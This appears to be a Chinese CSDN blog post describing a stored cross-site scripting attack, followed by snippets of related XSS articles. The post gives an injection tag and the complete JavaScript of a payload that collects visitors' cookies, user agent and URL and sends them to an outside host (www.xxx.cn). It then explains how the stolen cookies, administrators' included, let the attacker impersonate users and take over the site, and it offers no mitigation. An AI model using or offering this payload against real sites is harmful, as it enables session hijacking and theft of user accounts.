一次XSS攻击过程

最新推荐文章于 2024-06-24 22:16:50 发布
最新推荐文章于 2024-06-24 22:16:50 发布
阅读量977 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzz_781111/article/details/8989103
版权

1.一个录入数据的地方,没做转义检测【例如用户录入需求的地方】
2.用户录入了如下数据
<script src=http://www.xxx.cn/xss.js></script>
    该内容会展示给所有访问网站主页的用户【尤其是管理员】
3.xss.js 内容如下 
var cookie = escape(document.cookie);
var agent = escape(window.navigator.userAgent);
var url = escape(window.location.href);
var host = escape(window.location.host);
x=new Image();
x.src="http://www.xxx.cn/index.php?cookie="+cookie+"&agent="+agent+"&url="+url+"&host="+host;
由于xss.js被所有访问网站主页的用户访问。
所有用户的cookie被提取存入到www.xxx.cn
4.此时,黑客即可拿出任意cookie,模拟该对应用户访问网站,获得此用户权限,去处置该用户的各项数据
还有可能得到管理员的cookie,去完暴此网站的菊花
book2016
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一次xss攻击尝试(厦门工学院网站)附代码
Sengo的博客
03-15 926
厦门工学院网站xss跨站攻击尝试。
Web安全之XSS攻击与防御小结
02-23
(1)反射型:发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS随响应内容一起返回给浏览器,最后浏览器解析执行XSS代码,这个过程就像一次发射,所以叫反射型XSS。(2)存储型:...
XSS(跨站脚本攻击)详解 (上)
我不生产数据,只是数据的搬运工
02-03 561
XSS(跨站脚本攻击)详解 (上) Hack9月3日 XSS的原理和分类 跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目...
一次XSS攻击(跨站脚本攻击)基础了解
LANDUOSHUREN的博客
05-01 329
标语:本文章只针对与web基础的小伙伴们(感兴趣的小伙伴们记得收藏哦!) 一、xss前言 认识xss漏洞 XSS 攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS) 的缩写混淆,故将跨站脚本攻击缩写为 XSS,XSS 是一种在 web 应用中的计算机安全漏洞,它允许恶意 web 用户将代码植入到 web 网站里面,供给其它用户访问,当用户访问到有恶意代码的网页就会产生 xss 攻击。 XSS 攻击的危害包括 1、盗取各类用户帐号,如机器登录帐号
XSS(跨站脚本攻击)漏洞解析(带靶场演示)
最新发布
wudideaqing的博客
06-24 2020
XSS(跨站脚本攻击,全称Cross-Site Scripting)是一种常见网络安全漏洞,允许攻击者在用户浏览器中执行恶意脚本。攻击者通过在受信任网站中注入恶意代码,诱骗用户点击或加载恶意内容,从而窃取数据、篡改页面或劫持用户。
一次xss的黑盒挖掘和利用过程
weixin_30730151的博客
01-23 208
挖掘过程一: 自从上一次投稿,已经好久好久没写文章了。今天就着吃饭的时间,写篇文章,记录下自己学习xss这么久的心得。在我看来。Xss就是javascript注入,你可以在js语法规定的范畴内做任何事情,js可谓强大,本次结合一次挖掘xss的过程和xss的综合利用来探讨,小菜一枚,希望大牛不吝赐教。文章里的网站打码,大家见谅 我们先看看网站 测试储存型xss的话,黑盒测...
信息安全二 XSS攻击
小灰的博客
02-28 961
一、概述 ​ XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。一般XSS可以分为如下几种常见类型: ​ 1.反射性XSS; ​ 2.存储型XSS; ​ 3.DOM型XSS; 二、环境 靶场:Pikachu 浏览器:火狐 三、反射型 交互的数据一般不会被存放在数据库里,一次性,所见即所得,一般出现在查询类页面等。 1.首先输入一些特殊字符
跨站攻击(XSS+CSRF).docx
01-05
1. 验证Token:在每个可能执行敏感操作的表单中添加一个随机的、一次性有效的Token,服务器在接收到请求时检查Token的正确性。 2. Referer检查:验证请求的来源是否为预期的网站。 3. 用户确认:对于敏感操作,...
第一节 XSS跨站脚本分类-01
09-15
反射型 XSS 又称非持久性 XSS,这种攻击往往具有一次性。攻击者通过邮件等形式将包含 XSS 代码的链接发送给正常用户,当用户点击时,服务器接受该用户的请求并进行处理,然后把带有 XSS 的代码发送给用户。用户...
网络安全攻击方式XSS初探.pdf
09-20
由于XSS攻击的多样性和复杂性,网站的防护是一个持续的过程,需要开发者、安全团队和用户共同努力。随着5G、物联网等新技术的兴起,安全防护的挑战也会随之增加,因此对网络安全的认识和防范措施的了解,已经成为IT...
记录一次XSS(跨站脚本攻击)
qq_42271561的博客
04-13 862
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 问题 首先这个平台是一个物流园的门户网站,网站有一些相关的实时新闻和其他站点的友情链接。 这是当时他们网安部门的漏洞.
xss植入_记一次xss漏洞挖掘
weixin_35809747的博客
01-03 110
最近碰到的xss比较少,记录一下。测试xss漏洞,首先要确定输入输出点,再根据输出的数据来确定目标网站过滤以及转义的是哪种字符,因地制宜。有输入的地方便可能存在(各种)漏洞。测试发现,该处转义尖括号,过滤alert,但未过滤双引号,没过滤双引号一切都还好说。目标网站过滤alert(),可以用到的弹框函数还有prompt(),confirm()测试发现,目标网站未过滤prompt()xss payl...
xss安全测试流程
热门推荐
Breeze的博客
12-11 1万+
xss安全测试流程 1. xss本质 xss产生的本质只有两点,1. 对用户可控的输入内容没有进行有效的过滤;2. 将(没过滤的)用户可控内容输出回前端页面。所以xss的安全测试可以从这两方面入手。 2. 收集xss可能存在的点 由于xss的利用特征,存储型xss危害最大,可以盗取用户cookie,形成蠕虫等;反射型和DOM型主要用于钓鱼。所以在关注上述两点时应遵循以下规律: 用户可控的输入在协...
XSS攻击过程
weixin_30443731的博客
11-11 1286
大多数人对于XSS的原理有一个基本认识,这里不再重复,只给出一个能够演示其原理的完整样例。 1 角色分配 有XXS漏洞的网站,IP地址http://127.0.0.1/dvwa/DVWA-master,PHP为开发语言 受害访问者,浏览器为IE11 黑客的数据接收网站,IP地址http://127.0.0.1/xsser/index.php,xsser.me平台 ...
完整XSS wrom入侵流程
jahn的专栏
11-08 796
完整XSS wrom入侵流程不说废话,且看怎么实现,我先拿SOHU BLOG做示范.1.测试过滤字符,下面都是构造XSS所需要的关键字符(未包含全角字符,空格是个TABLE,//前是真正的空格),在个人档案处看过滤了哪些.’’;:!--"=&#{()} //结果’’;:!--"=&#{()} // (&后是amp,论坛过滤了)过滤了"javascript","&"和"/"这两个
实现完整的XSS wrom流程
weixin_34221276的博客
01-05 347
文/茄子宝 1.测试过滤字符,下面都是构造XSS所需要的关键字符(未包含全角字符,空格是个TABLE,\/前是真正的空格),在个人档案处看过滤了哪些. '';:!--"=&amp;#{()} \/ 结果 ”;:!–”=&#{()} // (&后是amp,论坛过滤了) 过滤了”javascript”,”&am...
XSS攻击
qq_56486005的博客
10-05 3876
一、Cross Site Scripting 原理: 攻击者向Web页面里插入恶意Script代码,当用户浏览该页面时,,嵌入到Script的代码被执行,达到恶意攻击的目的。 分类: 1.发送连接。 2.用户点击恶意连接。 3.网站将XSS同正常的网页返回到用户的浏览器。 4.用户的浏览器解析了网页中的恶意代码,向恶意服务器发起请求。 5.黑客从自己搭建的恶意服务器获取用户的相关信息。 需要欺骗用户自己去点击恶意连接才能触发XSS代码。大多时用来盗用cookie的。非持久化。 1.黑客在目标服务器上构造
xss攻击详解
剁椒鱼头没剁椒的博客
11-15 8620
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。
存储型XSS攻击:成因、挖掘与防御策略
XSS攻击的成因主要包括以下几个方面: 1. **输入过滤不足**:开发过程中未能充分过滤用户输入,使得恶意代码得以插入到数据库中。 2. **输出控制不当**:在渲染用户提供的数据时,没有进行适当的转义处理,导致代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值